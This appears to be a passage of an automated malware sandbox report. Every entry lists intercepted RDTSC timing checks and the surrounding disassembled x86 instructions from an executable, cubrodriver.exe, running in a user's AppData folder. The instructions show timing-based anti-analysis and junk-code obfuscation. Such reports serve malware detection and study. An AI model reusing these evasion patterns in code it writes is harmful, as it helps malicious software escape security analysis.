Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 58A381 second address: 58A3F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F01B44E8CA0h 0x0000000d add esi, dword ptr [ebp+122D297Ah] 0x00000013 popad 0x00000014 sub dword ptr [ebp+122D38B2h], ebx 0x0000001a push 00000003h 0x0000001c mov ecx, dword ptr [ebp+122D2A7Eh] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007F01B44E8C98h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 00000015h 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e mov dword ptr [ebp+122D37FBh], esi 0x00000044 mov dword ptr [ebp+122D1BBEh], edx 0x0000004a push 00000003h 0x0000004c cld 0x0000004d push 4DCC048Ah 0x00000052 pushad 0x00000053 jmp 00007F01B44E8C9Dh 0x00000058 push eax 0x00000059 push edx 0x0000005a jc 00007F01B44E8C96h 0x00000060 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5AA1C5 second address: 5AA1E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5AA1E5 second address: 5AA1EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5A8036 second address: 5A8040 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F01B4D45EDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5A8040 second address: 5A8078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F01B44E8CA2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F01B44E8C98h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F01B44E8CA6h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5A8078 second address: 5A807F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5A8333 second address: 5A833F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 ja 00007F01B44E8C96h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5A8E9F second address: 5A8EBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EDBh 0x00000007 jmp 00007F01B4D45EE1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5A91CC second address: 5A91D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 572526 second address: 57252A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 57252A second address: 57252E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 57252E second address: 572551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F01B4D45ED6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007F01B4D45ED8h 0x00000013 push edx 0x00000014 pop edx 0x00000015 jo 00007F01B4D45EE2h 0x0000001b jnp 00007F01B4D45ED6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5A9A3D second address: 5A9A59 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F01B44E8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F01B44E8C9Eh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5A9A59 second address: 5A9A7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a ja 00007F01B4D45EF8h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5A9A7B second address: 5A9A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F01B44E8CA2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5AC295 second address: 5AC2AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5AC2AD second address: 5AC2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5AC2B1 second address: 5AC2B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5AC2B7 second address: 5AC2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F01B44E8CA7h 0x0000000e jg 00007F01B44E8C98h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 57DF56 second address: 57DF5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 57DF5C second address: 57DF60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 57DF60 second address: 57DF77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F01B4D45EDDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 57DF77 second address: 57DF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5AF8BC second address: 5AF8CD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F01B4D45ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b pushad 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B173A second address: 5B173E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B1C64 second address: 5B1C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B1C68 second address: 5B1C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B0635 second address: 5B063C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BA911 second address: 5BA917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BA917 second address: 5BA91B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BAB1F second address: 5BAB2C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BAE5B second address: 5BAE75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BB318 second address: 5BB31C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BB31C second address: 5BB377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F01B4D45EEDh 0x0000000c jmp 00007F01B4D45EE7h 0x00000011 popad 0x00000012 mov dword ptr [esp], ebx 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F01B4D45ED8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov edi, 5AB6FDF6h 0x00000034 push eax 0x00000035 jp 00007F01B4D45EDEh 0x0000003b push edi 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BB749 second address: 5BB75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F01B44E8C9Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BC68A second address: 5BC68E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BCF4D second address: 5BCF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BC68E second address: 5BC69C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F01B4D45ED6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BCF51 second address: 5BCF6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BE0E6 second address: 5BE0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BE2FA second address: 5BE300 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BCF6D second address: 5BCF73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BE0EA second address: 5BE0F0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BE0F0 second address: 5BE105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F01B4D45EE0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BF9CE second address: 5BF9D8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F01B44E8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BF9D8 second address: 5BFA3F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F01B4D45ED8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D1E49h], esi 0x0000002b push 00000000h 0x0000002d mov si, CEE0h 0x00000031 push 00000000h 0x00000033 jo 00007F01B4D45EF6h 0x00000039 call 00007F01B4D45EE9h 0x0000003e mov esi, dword ptr [ebp+122D202Ch] 0x00000044 pop esi 0x00000045 push eax 0x00000046 jng 00007F01B4D45EDEh 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BF723 second address: 5BF729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5812DE second address: 5812E6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C2571 second address: 5C2598 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8C9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F01B44E8CA6h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C2598 second address: 5C259D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C259D second address: 5C25D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F01B44E8C98h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov di, cx 0x00000029 push 00000000h 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push edx 0x00000030 pop edx 0x00000031 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C25D9 second address: 5C25EF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F01B4D45ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c jp 00007F01B4D45EE4h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C25EF second address: 5C25F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C0DA9 second address: 5C0DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C0DAD second address: 5C0DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C40D1 second address: 5C40D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C51CF second address: 5C51D9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F01B44E8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C51D9 second address: 5C523D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F01B4D45EE2h 0x0000000e nop 0x0000000f jmp 00007F01B4D45EE1h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F01B4D45ED8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov bx, 0509h 0x00000034 push 00000000h 0x00000036 sub dword ptr [ebp+122D23F7h], edi 0x0000003c xchg eax, esi 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C523D second address: 5C5241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C5241 second address: 5C5247 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C5247 second address: 5C5266 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007F01B44E8C96h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F01B44E8C9Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C7182 second address: 5C7186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C6323 second address: 5C6339 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F01B44E8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jng 00007F01B44E8CA8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C6339 second address: 5C633D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C633D second address: 5C6341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C8117 second address: 5C811D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C6341 second address: 5C63D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 pushad 0x00000008 jmp 00007F01B44E8C9Bh 0x0000000d cld 0x0000000e popad 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F01B44E8C98h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 mov ebx, dword ptr [ebp+1247D614h] 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d add edi, dword ptr [ebp+122D2AA6h] 0x00000043 mov eax, dword ptr [ebp+122D013Dh] 0x00000049 pushad 0x0000004a mov dword ptr [ebp+122D2341h], edi 0x00000050 mov ebx, dword ptr [ebp+122D2AFAh] 0x00000056 popad 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push ecx 0x0000005c call 00007F01B44E8C98h 0x00000061 pop ecx 0x00000062 mov dword ptr [esp+04h], ecx 0x00000066 add dword ptr [esp+04h], 00000014h 0x0000006e inc ecx 0x0000006f push ecx 0x00000070 ret 0x00000071 pop ecx 0x00000072 ret 0x00000073 mov edi, dword ptr [ebp+122D2EA5h] 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c push ebx 0x0000007d jnc 00007F01B44E8C96h 0x00000083 pop ebx 0x00000084 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C811D second address: 5C8121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5C63D2 second address: 5C63D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5CA0DA second address: 5CA0E4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F01B4D45ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5CA0E4 second address: 5CA0EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5CA0EA second address: 5CA0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5CB123 second address: 5CB18A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F01B44E8C96h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D30BAh], ebx 0x00000013 movsx ebx, bx 0x00000016 push 00000000h 0x00000018 call 00007F01B44E8CA9h 0x0000001d mov edi, dword ptr [ebp+122D25E5h] 0x00000023 pop ebx 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007F01B44E8C98h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 push eax 0x00000041 push edi 0x00000042 je 00007F01B44E8C9Ch 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5CB29B second address: 5CB2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jmp 00007F01B4D45EE5h 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5CB2BB second address: 5CB308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push dword ptr fs:[00000000h] 0x00000010 mov dword ptr [ebp+12462866h], eax 0x00000016 mov edi, 7C1C5FB0h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov ebx, 29019EC6h 0x00000027 mov eax, dword ptr [ebp+122D116Dh] 0x0000002d jnc 00007F01B44E8C9Ch 0x00000033 mov edi, dword ptr [ebp+122D2BADh] 0x00000039 push FFFFFFFFh 0x0000003b mov di, 9109h 0x0000003f nop 0x00000040 pushad 0x00000041 jnp 00007F01B44E8C98h 0x00000047 push edx 0x00000048 pop edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5CB308 second address: 5CB30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5CF351 second address: 5CF357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
